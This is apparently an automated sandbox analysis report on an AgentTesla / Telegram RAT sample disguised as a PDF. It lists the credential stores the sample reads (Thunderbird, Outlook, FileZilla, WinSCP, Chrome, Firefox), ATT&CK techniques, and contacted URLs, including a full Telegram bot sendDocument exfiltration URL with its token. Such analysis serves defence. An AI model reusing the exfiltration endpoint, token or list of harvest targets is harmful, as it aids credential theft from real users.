                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3e74280.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.3edcc90.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection312Masquerading11OS Credential Dumping2Security Software Discovery211Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Credentials in Registry1Virtualization/Sandbox Evasion131SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection312NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information12Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing23DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      20220114080343434.pdf.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.urwpp.dedc0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cnP0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htmSw0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.founder.c0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kra-e0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://UeFrqT.com0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      https://api.telegram.org40%URL Reputationsafe
                      http://www.carterandcone.comue0%URL Reputationsafe
                      http://www.typography.net0%URL Reputationsafe
                      http://crl.veris0%Avira URL Cloudsafe
                      http://www.carterandcone.com90%URL Reputationsafe
                      http://www.fontbureau.comB.TTF0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/denHp0%Avira URL Cloudsafe
                      http://www.sajatypeworks.comW0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cne&0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
                      http://www.carterandcone.comuy0%Avira URL Cloudsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sajatypeworks.coma0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      https://xXcVm5kmD6Gyza.org(0%Avira URL Cloudsafe
                      http://www.fonts.comiv0%Avira URL Cloudsafe
                      http://www.urwpp.de0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.carterandcone.como.0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.typography.net(0%Avira URL Cloudsafe
                      http://www.tiro.com5v0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.sajatypeworks.coms0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.founder.com.cn/cnTC0%URL Reputationsafe
                      https://xXcVm5kmD6Gyza.org0%Avira URL Cloudsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://en.w0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn/0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn90%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.carterandcone.comn-u/0%Avira URL Cloudsafe
                      http://www.sandoll.co.krr-t0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/staff/dennis.htmNp0%Avira URL Cloudsafe
                      http://www.carterandcone.comesS0%Avira URL Cloudsafe
                      http://www.typography.netiv0%Avira URL Cloudsafe
                      http://www.urwpp.dem0%Avira URL Cloudsafe
                      http://fontfabrik.com(0%Avira URL Cloudsafe
                      http://www.sandoll.co.kru-hX0%Avira URL Cloudsafe
                      http://www.tiro.comic0%URL Reputationsafe
                      http://www.micro.0%Avira URL Cloudsafe
                      http://www.urwpp.dec0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.fontbureau.com/designersG20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                            high
                            http://www.urwpp.dedc20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.founder.com.cn/cnP20220114080343434.pdf.exe, 00000000.00000003.286148512.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286200312.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/?20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bThe20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgRegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designers?20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/frere-jones.html.$20220114080343434.pdf.exe, 00000000.00000003.291515061.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291556929.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291697526.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291598283.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291473881.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291757927.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291647210.0000000005CEF000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.galapagosdesign.com/staff/dennis.htmSw20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tiro.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers20220114080343434.pdf.exe, 00000000.00000003.290845442.0000000005CF2000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.founder.c20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.goodfont.co.kr20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sandoll.co.kra-e20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.com20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://UeFrqT.comRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designersR20220114080343434.pdf.exe, 00000000.00000003.291078110.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290998503.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291023701.0000000005CEF000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sajatypeworks.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282926493.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283849906.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283794895.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.netD20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cn/cThe20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htm20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283885811.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283942441.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283961213.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org4RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.carterandcone.comue20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.typography.net20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://crl.verisRegSvcs.exe, 00000008.00000002.558576320.00000000065C8000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.carterandcone.com920220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comB.TTF20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.galapagosdesign.com/staff/denHp20220114080343434.pdf.exe, 00000000.00000003.295330398.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295411677.0000000005CEB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
